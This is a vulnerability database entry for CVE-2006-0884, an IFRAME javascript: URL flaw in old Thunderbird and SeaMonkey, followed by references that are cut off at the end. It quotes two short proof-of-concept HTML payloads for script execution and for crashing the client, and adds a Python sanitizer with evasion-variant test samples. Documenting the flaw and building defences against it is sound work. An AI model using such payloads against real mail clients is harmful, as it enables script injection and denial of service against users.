Mozilla Thunderbird IFRAME JavaScript Execution and Denial of Service Vulnerability

Vulnerability ID: 1109796
Vulnerability type: Input validation
Published: 2006-02-22
Updated: 2007-09-05
CVE ID: CVE-2006-0884
CNNVD ID: CNNVD-200602-379
Platform: Linux
CVSS score: 9.3
|Vulnerability Sources
https://www.exploit-db.com/exploits/27257
https://www.securityfocus.com/bid/16770
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-379
|Vulnerability Details
Thunderbird is a full-featured mail client that supports the IMAP and POP mail protocols and HTML-formatted mail. Thunderbird's handling of HTML-formatted mail is flawed, and a remote attacker could exploit this vulnerability to execute malicious script code on the client machine. Thunderbird's WYSIWYG rendering engine does not adequately filter JavaScript, allowing JavaScript to be placed in the SRC attribute of an IFRAME tag. As a result, script can execute, or the application can be crashed (denial of service), when the user edits or replies to the message, even if JavaScript has been disabled.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/16770/info

Multiple Mozilla products are prone to a script-execution vulnerability. 

The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing malicious script code in an IFRAME and the user tries to reply to the mail. Arbitrary JavaScript can be executed even if the user has disabled JavaScript execution in the client. 

The following Mozilla products are vulnerable to this issue:
- Mozilla Thunderbird, versions prior to 1.5.0.2, and prior to 1.0.8
- Mozilla SeaMonkey, versions prior to 1.0.1
- Mozilla Suite, versions prior to 1.7.13

<html>
<body>
<iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
</body>
</html>

* Denial of service (application crash) :

<html>
<body>
<iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe>
</body>
</html>
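As an added defensive example (not code from the advisory, from exploit-db, or from Mozilla's own fix), the following Python audit/sanitizer shows how a mail gateway or client-side filter can detect and neutralise javascript: URLs in IFRAME and other URL-bearing attributes before a message reaches a WYSIWYG editor. It normalises the scheme the way a renderer would (entity decoding, surrounding whitespace and control characters, case), so the padded and entity-encoded variants in the constructed samples are caught as well as the plain form; the sample bodies are constructed to mirror the PoC above and are not real captures.

```python
import html
import re
from html.parser import HTMLParser

# Attributes that carry a URL; a javascript: scheme in any of them runs script
URL_ATTRS = {"src", "href", "data", "action", "background"}

def url_scheme(value):
    """Scheme of an attribute value as a renderer would see it. HTMLParser has
    already decoded entities; here we drop ASCII whitespace/control bytes that
    browsers ignore inside the scheme and lowercase the result."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    m = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned, re.I)
    return m.group(1).lower() if m else ""

class ScriptUrlSanitizer(HTMLParser):
    """Records every javascript: URL attribute and re-serialises the markup
    with each such attribute rewritten to about:blank."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings = [], []
    def handle_starttag(self, tag, attrs, closing=False):
        parts = []
        for name, value in attrs:
            if value is not None and name in URL_ATTRS \
                    and url_scheme(value) == "javascript":
                self.findings.append((tag, name, value))  # keep evidence for logging
                value = "about:blank"                      # neutralise the URL
            parts.append(name if value is None
                         else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join([tag] + parts) + (" />" if closing else ">"))
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs, closing=True)
    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize(html_text):
    """Return (sanitized_html, findings) for one HTML mail body."""
    p = ScriptUrlSanitizer()
    p.feed(html_text)
    p.close()
    return "".join(p.out), p.findings

# Constructed sample bodies (modelled on the PoC above, not real mail)
SAMPLES = {
    "plain": '<html><body><iframe src="javascript:alert(1)"></iframe></body></html>',
    "padded": '<iframe src=" JavaScript:parent.document.write(1)"></iframe>',
    "entity": '<iframe src="&#106;avascript:alert(1)"></iframe>',
    "benign": '<iframe src="https://example.com/"></iframe>',
}
```

Each sample is processed with `sanitize(SAMPLES[name])`; the findings list is what a filter would log or alert on, and the first element is the body safe to hand to the editor.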
|Affected Products
- Ubuntu: Ubuntu Linux 5.10 powerpc
- Ubuntu: Ubuntu Linux 5.10 i386
- Ubuntu: Ubuntu Linux 5.10 amd64
- Ubuntu: Ubuntu Linux 5.04 powerpc
- Ubuntu: Ubuntu Linux 5.04 i386
- Ubuntu: Ubuntu
|References

Source: BID
Name: 16770
Link: http://www.securityfocus.com/bid/16770
Source: VUPEN
Name: ADV-2006-3749
Link: http://www.frsirt.com/english/advisories/2006/3749
Source: DEBIAN
Name: DSA-1051
Link: http://www.debian.org/security/2006/dsa-1051
Source: DEBIAN
Name: DSA-1046
Link: http://www.debian.org/security/2006/dsa-1046
Source: XF
Name: mozilla-inline-fwd-code-execution(25983)
Link: http://xforce.iss.net/xforce/xfdb/25983
Source: UBUNTU
Name: USN-276-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-276-1
Source: HP
Name: HPSBUX02156
Link: http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
Source: HP
Name: HPSBUX02122
Link: http://www.securityfocus.com/archive/1/archive/1/438730/100/0/threaded
Source: FEDORA
Name: FLSA:189137-1
Link: http://www.securityfocus.com/archive/1/archive/1/436296/100/0/threaded
Source: BUGTRAQ
Name: 20060222 Mozilla Thunderbird: Remote Code Execution & Denial of Service
Link: http://www.securityfocus.com/archive/1/archive/1/425786/100/0/threaded
Source: REDHAT
Name: RHSA-2006:0330
Link: http://www.redhat.com/support/errata/RHSA-2006-0330.html
Source: REDH